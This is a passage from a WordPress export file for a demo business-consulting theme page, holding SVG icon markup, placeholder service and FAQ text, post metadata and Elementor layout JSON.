v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Government Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>	        
				<h5><a href="#">Financial Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 -9 512.00092 512"><path d="m243.273438 147.371094c-4.140626 0-7.5 3.359375-7.5 7.5v74.769531c0 4.144531 3.359374 7.5 7.5 7.5 4.144531 0 7.5-3.355469 7.5-7.5v-74.769531c0-4.140625-3.359376-7.5-7.5-7.5zm0 0"></path><path d="m152.441406 383.160156 64.75-37.386718c3.589844-2.070313 4.816406-6.65625 2.746094-10.242188s-6.660156-4.816406-10.242188-2.746094l-64.753906 37.386719c-3.585937 2.070313-4.816406 6.65625-2.746094 10.242187 2.082032 3.605469 6.675782 4.808594 10.246094 2.746094zm0 0"></path><path d="m383.484375 349.453125-64.753906-37.386719c-3.589844-2.070312-8.175781-.839844-10.246094 2.746094s-.839844 8.171875 2.746094 10.242188l64.753906 37.386718c1.179687.679688 2.46875 1.003906 3.742187 1.003906 2.589844 0 5.113282-1.34375 6.5-3.75 2.070313-3.585937.84375-8.171874-2.742187-10.242187zm0 0"></path><path d="m63.074219 331.53125c.371093 0 .75-.027344 1.128906-.085938 4.097656-.617187 6.914063-4.4375 6.292969-8.535156-1.378906-9.132812-2.078125-18.472656-2.078125-27.757812 0-71.730469 41.214843-135.011719 103.09375-165.410156 3.71875-1.828126 5.253906-6.320313 3.425781-10.039063-1.824219-3.714844-6.316406-5.25-10.035156-3.425781-67.039063 32.929687-111.484375 101.449218-111.484375 178.875 0 10.035156.757812 20.125 2.25 30 .558593 3.714844 3.757812 6.378906 7.40625 6.378906zm0 0"></path><path d="m170.335938 166.796875c-43.941407 28.21875-70.171876 76.203125-70.171876 128.355469 0 3.332031.117188 6.808594.355469 10.34375.273438 4.101562 3.8125 7.257812 7.980469 6.984375 4.132812-.277344 7.261719-3.855469 6.984375-7.984375-.214844-3.203125-.324219-6.347656-.324219-9.34375 0-47.023438 23.65625-90.289063 63.28125-115.738282 3.484375-2.238281 4.496094-6.875 2.257813-10.359374-2.238281-3.488282-6.878907-4.496094-10.363281-2.257813zm0 0"></path><path d="m320.199219 123.789062c8.589843 3.398438 17.015625 7.492188 25.039062 12.160157 62.003907 36.074219 95.972657 103.523437 91.128907 172.296875-.292969 4.128906 2.820312 7.714844 6.953124 8.007812.179688.011719.355469.015625.535157.015625 3.898437 0 7.195312-3.019531 7.472656-6.972656 5.25-74.5-31.621094-147.375-98.546875-186.3125-8.671875-5.042969-17.773438-9.464844-27.0625-13.144531-3.851562-1.523438-8.210938.363281-9.734375 4.214844-1.523437 3.851562.363281 8.207031 4.214844 9.734374zm0 0"></path><path d="m313.492188 171.933594c2.867187 1.421875 5.640624 2.90625 8.234374 4.417968 40.648438 23.648438 66.148438 65.855469 68.21875 112.902344.175782 4.023438 3.496094 7.167969 7.484376 7.167969.113281 0 .226562 0 .335937-.007813 4.140625-.179687 7.34375-3.683593 7.164063-7.820312-2.296876-52.171875-30.578126-98.976562-75.660157-125.207031-2.882812-1.675781-5.953125-3.324219-9.117187-4.890625-3.710938-1.839844-8.210938-.320313-10.050782 3.386718-1.839843 3.710938-.320312 8.210938 3.390626 10.050782zm0 0"></path><path d="m371.164062 436.148438c-7.078124 5.9375-14.6875 11.398437-22.609374 16.234374-61.472657 37.511719-136.953126 35-194.902344-1.839843-3.492188-2.222657-8.132813-1.191407-10.351563 2.304687-2.222656 3.496094-1.191406 8.128906 2.304688 10.351563 63.878906 40.613281 145.515625 41.800781 210.761719 1.984375 8.5625-5.222656 16.78125-11.125 24.4375-17.542969 3.171874-2.664063 3.585937-7.390625.925781-10.566406-2.660157-3.171875-7.390625-3.589844-10.566407-.925781zm0 0"></path><path d="m332.015625 425.285156c2.855469-1.738281 5.761719-3.65625 8.648437-5.695312 3.382813-2.386719 4.1875-7.066406 1.796876-10.449219-2.390626-3.382813-7.066407-4.1875-10.453126-1.800781-2.609374 1.847656-5.234374 3.574218-7.804687 5.140625-40.136719 24.5-89.390625 26.84375-131.757813 6.273437-3.726562-1.808594-8.214843-.253906-10.023437 3.472656-1.808594 3.722657-.253906 8.210938 3.472656 10.019532 46.933594 22.789062 101.5625 20.230468 146.121094-6.960938zm0 0"></path><path d="m506.246094 418.738281-153.742188-142.207031c-1.605468-1.488281-3.773437-2.199219-5.953125-1.945312l-45.195312 5.210937c-1.582031-5-3.917969-9.667969-6.863281-13.875l-6.4375-176.585937c-.148438-4.136719-3.628907-7.382813-7.765626-7.21875-4.140624.148437-7.371093 3.628906-7.222656 7.765624l5.882813 161.445313c-15.636719-9.433594-35.507813-9.710937-51.355469-.75l-24.09375-32.464844 45.523438-200.886719c.296874-1.3125 1.445312-2.226562 2.789062-2.226562h15.765625c1.546875 0 2.800781 1.210938 2.859375 2.753906l1.707031 46.886719c.152344 4.140625 3.652344 7.359375 7.769531 7.21875 4.136719-.148437 7.371094-3.625 7.222657-7.765625l-1.710938-46.886719c-.351562-9.648437-8.191406-17.207031-17.847656-17.207031h-15.765625c-8.398438 0-15.5625 5.722656-17.414062 13.910156l-46.285157 204.25c-.484375 2.132813-.011719 4.371094 1.289063 6.125l26.355468 35.511719c-7.160156 7.457031-12.089843 17.070313-13.6875 27.757813l-193.675781 121.4375c-8.183593 5.128906-10.808593 15.699218-5.980469 24.058593l7.882813 13.65625c3.273437 5.664063 9.167969 8.941407 15.40625 8.941407 1.773437 0 3.574219-.265626 5.351563-.816407l45.554687-14.128906c3.957031-1.226563 6.171875-5.429687 4.941406-9.382813-1.226562-3.957031-5.425781-6.167968-9.382812-4.941406l-45.558594 14.128906c-1.28125.398438-2.652344-.136718-3.324219-1.300781l-7.882812-13.65625c-.773438-1.335937-.351563-3.027343.957031-3.851562l186.105469-116.6875c3.703125 18.878906 17.835937 34.054687 36.125 39.28125l-15.246094 35.195312-123.925781 38.4375c-3.957031 1.226563-6.167969 5.425781-4.941407 9.382813 1.226563 3.957031 5.429688 6.167968 9.386719 4.941406l127.21875-39.457031c2.085938-.648438 3.789063-2.175781 4.660157-4.183594l18.359374-42.386719c1.921876-.054687 3.816407-.214844 5.679688-.476562l218.09375 115.535156c2.683594 1.421875 5.558594 2.101562 8.390625 2.101562 6.167969 0 12.125-3.21875 15.433594-8.949218l7.886719-13.65625c4.195312-7.273438 2.824218-16.335938-3.339844-22.039063zm-253.636719-87.476562c-20.011719 0-36.109375-16.453125-36.109375-36.109375 0-19.941406 16.238281-36.105469 36.109375-36.105469 19.875 0 36.105469 16.195313 36.105469 36.105469 0 19.675781-15.972656 36.109375-36.105469 36.109375zm243.984375 102.015625-7.882812 13.65625c-.769532 1.335937-2.441407 1.820312-3.8125 1.09375l-205.929688-109.089844c15.308594-9.246094 24.945312-26.113281 24.742188-44.3125l41.136718-4.746094 151.214844 139.871094c.984375.914062 1.207031 2.363281.53125 3.527344zm0 0"></path></svg>	        
				<h5><a href="#">Natural Resources</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
			<h6>how we help</h6>		
			<h3>Align Costs with Strategy & Focus on Growth</h3>		
			<a href="http://wpdemo.archiwp.com/maxbizz-business/blog/">get in touch</a>
			<h4>How It Works & How We Do It</h4>		
		<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.</p><p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable development of your organization from project.</p>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
	        <h6>CORPORATE MANAGEMENT</h6>			
		<blockquote>“I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>		
			<h4>Business Planning & Strategy</h4>		
				In what areas do you provide management consulting? 
					<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.</p>				
				In which countries do you provide consulting services? 
					<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.</p>				
				How is a consulting project started and organized? 
					<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.</p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>977</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 08:25:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 08:25:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-consulting]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"2c774f8","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"6bc8536","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"ed430ae","elType":"widget","settings":{"title":"Services","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"017708c","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"f67d26f","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"977088c","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9348f7e","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"786190f","elType":"widget","settings":{"text":"Divider","color":"#52C5B6","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"343704f","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#52C5B6","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"a0bb326","elType":"widget","settings":{"title":"Brochures","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"f12bdfe","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"1396f28","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"4fa4a55","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9af4798","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"d4ee160","elType":"widget","settings":{"text":"Divider","color":"#52C5B6","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"60ffced","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home5.jpg","id":2373},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"904e2fa","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"3c3d54a","elType":"widget","settings":{"title":"Strategic & Tactical Planning","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"dec0c01","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"e91e771","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"65","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"122c65b","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"50","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"7bddef1","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":631},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"522b33e","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":637},"library":"svg"},"title":"Government Services","des":"We help financial institutions, from banking and insurance to 